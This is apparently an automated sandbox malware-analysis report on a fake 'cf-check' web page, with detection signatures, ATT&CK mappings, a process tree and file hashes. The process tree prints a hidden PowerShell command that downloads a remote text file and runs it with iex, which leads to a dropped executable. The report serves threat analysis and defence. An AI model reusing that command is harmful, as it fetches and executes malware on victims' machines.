hxxps://check-cf-ver1[.]b-cdn[.]net/version3/cf-check[.]html

Analysis

max time kernel
283s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://check-cf-ver1.b-cdn.net/version3/cf-check.html

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://benetinc.com/next/zukaz.txt

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
58	4908	PowerShell.exe
60	4908	PowerShell.exe
64	4908	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4908	PowerShell.exe
4908	PowerShell.exe

Executes dropped EXE 1 IoCs

pid	Process
3872	beks.exe

Loads dropped DLL 1 IoCs

pid	Process
3872	beks.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	beks.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2592	msedge.exe
2592	msedge.exe
4692	msedge.exe
4692	msedge.exe
3280	identity_helper.exe
3280	identity_helper.exe
4908	PowerShell.exe
4908	PowerShell.exe
4908	PowerShell.exe
1528	msedge.exe
1528	msedge.exe
1528	msedge.exe
1528	msedge.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1116	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4908	PowerShell.exe
Token: SeDebugPrivilege	1116	taskmgr.exe
Token: SeSystemProfilePrivilege	1116	taskmgr.exe
Token: SeCreateGlobalPrivilege	1116	taskmgr.exe
Token: 33	1116	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1116	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
4692	msedge.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe
1116	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 3568	4692	msedge.exe	85
PID 4692 wrote to memory of 3568	4692	msedge.exe	85
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2104	4692	msedge.exe	87
PID 4692 wrote to memory of 2592	4692	msedge.exe	88
PID 4692 wrote to memory of 2592	4692	msedge.exe	88
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89
PID 4692 wrote to memory of 3044	4692	msedge.exe	89

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://check-cf-ver1.b-cdn.net/version3/cf-check.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcff346f8,0x7ffdcff34708,0x7ffdcff34718
  2⤵
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
  2⤵
  PID:2104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
  2⤵
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5921610950672822864,3593676313359029665,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:1376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2612

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://benetinc.com/next/zukaz.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
- C:\Users\Admin\AppData\Roaming\Hashed\beks.exe
  "C:\Users\Admin\AppData\Roaming\Hashed\beks.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2664

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bffcefacce25cd03f3d5c9446ddb903d

SHA1
8923f84aa86db316d2f5c122fe3874bbe26f3bab

SHA256
23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

SHA512
761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d22073dea53e79d9b824f27ac5e9813e

SHA1
6d8a7281241248431a1571e6ddc55798b01fa961

SHA256
86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

SHA512
97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
267B

MD5
bbf1886973649350518de664cde7c3c2

SHA1
ec61c29a46152e33dc56599048c4fd23aad43814

SHA256
144e1c55a8f38152128f986839cf7f913d47bdf03f27373dc74b2ca6a96c1605

SHA512
fe8f3edf6bfed4d2dd3affafdd605fba80c65fc08afd1fedbaa5e60413badab30e0fdf25adb24382eefe06dbabe8d40e8b532958900a102e98eb7025ed536eea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
267B

MD5
ce67806f588bdb0abe1ff9848b00182a

SHA1
4f374452ba911a391c4317422f4610ee4375a94a

SHA256
69d45550a3837fa8ef80d9d0d7d2188403e59416e2419e43dd01d8c1d714c787

SHA512
250e1680ae4c955e3fa83e252182822bfcf8f118d4653b93b12328e4f00cd71b2ebda4e52199b8b85c5a7afc4f1f235f283510ba13e65d0678a1ada51a053776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f6d76117945b330f5a33d64527ab8e44

SHA1
e42f68da414aa4657bef72e549d93034b7c9bbb2

SHA256
91e0da57f56ec47537431f3d6940dd23913555c97195d72c2a23603ac49305a7

SHA512
8c27f353336af04f02197a8075b9b44be1a5336c66713a95206f829318886942d8f766bbe6716416bce50f0ec89bde125b830a56eb07183a09b7f9fb6cf8e92f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1362007515cd82ade62d53b0ee31d3bd

SHA1
b823123c4f0d193cb428eaba5ca96ff13f09b67b

SHA256
413970eb84383d1e06757ab7b6292093ada85899b59566258ad60ba647391719

SHA512
03447b0d772295f11fa2a450fe2c30a1a53fefd202e270fa1433a17beae59c6c3e14e94a800c761622900da2a45006615bb95fed0af63b5a143cbbf9081172ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fb563343496aa7faaeec0513f1a1009d

SHA1
2160b0cafee56375fb3a0bcaa5de1de28c971dc2

SHA256
8f230ae4b5e1c04e07e3d0fc6b3bed6bcb3e5e483fd16d3da4cc8eca52d7655b

SHA512
3bd3536a682d9497c729c024891f91599952de31bc09a3e6a53f3b8187a96b36d3c2c1b54ccd84e48c73e5bf5483a6dd88cc48c676bb2fdf3c5c14180d25506d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ac58892d2a153dff4959a0afa35c819c

SHA1
50c1af6daf87661ea026b38b3190fe591fcda0ff

SHA256
dbc7f76b80f3a4a4ea280c334ed1e802f530bbfa42855cf114877b89ff68a8f2

SHA512
b9df08d04f67df992b14287a37148de5b54a03eb9af924c98aaf30be2e712cac34076fd00f506b1fdd00502eee80bcf3a923576ed7ee78cc5b0d3174cfbdff7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a5d33f034b6c31351b329cabed4282e7

SHA1
27f0c81b5690529d295a7de01899dfa694154e2e

SHA256
9ed1e1c8e27b042d433bf38a183f3a215d9df23c1effea68a6ea5abb906802a6

SHA512
f6a3024f84f879ceadf5509ad2265efbbc74913dc6bc87019897793a49deb57b498c9a433125149cbb2b4f9f976efe9fe6af5a81c83a83ecc761579bd7029a09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
203B

MD5
a3eef148622eff2eda48eec20df7e2f2

SHA1
9ca1f9d8a43669bb0f2ae9a3d85557b88417672f

SHA256
6696d0a7456852831ac79e9fb4cb3daf949d6a15824bf6aea504bd31944dd42e

SHA512
f8cacc580d9a97342de7d986bc3a2cf667dff988c1e80d5756e9a6ac9fa091b3e82cdf68141bfdeb2af70b8fec5918b9ea877de4f18b24530d468f453e23513b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b6629.TMP

Filesize
203B

MD5
c9e1fda50f8620aecd801e084736c85c

SHA1
06199e12801d9926153ba20c76935e1ae18880f3

SHA256
d2a1655bdddc96f84a8adc0299cbf1dfcbea978a0fbba5441ddc28f7462b318c

SHA512
e5d742ab3de751bad4089dd36ba84010b617ba09800112ef0e0ae5349f3fb3bcc5c9b945939d3151085b9549f14c45e07e12744c7125f005eeaf2442d1914269

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e60c4687827c6cfd1891f265e651a5ae

SHA1
5dc1f91c63da918f915de551c9c5c26af38540f2

SHA256
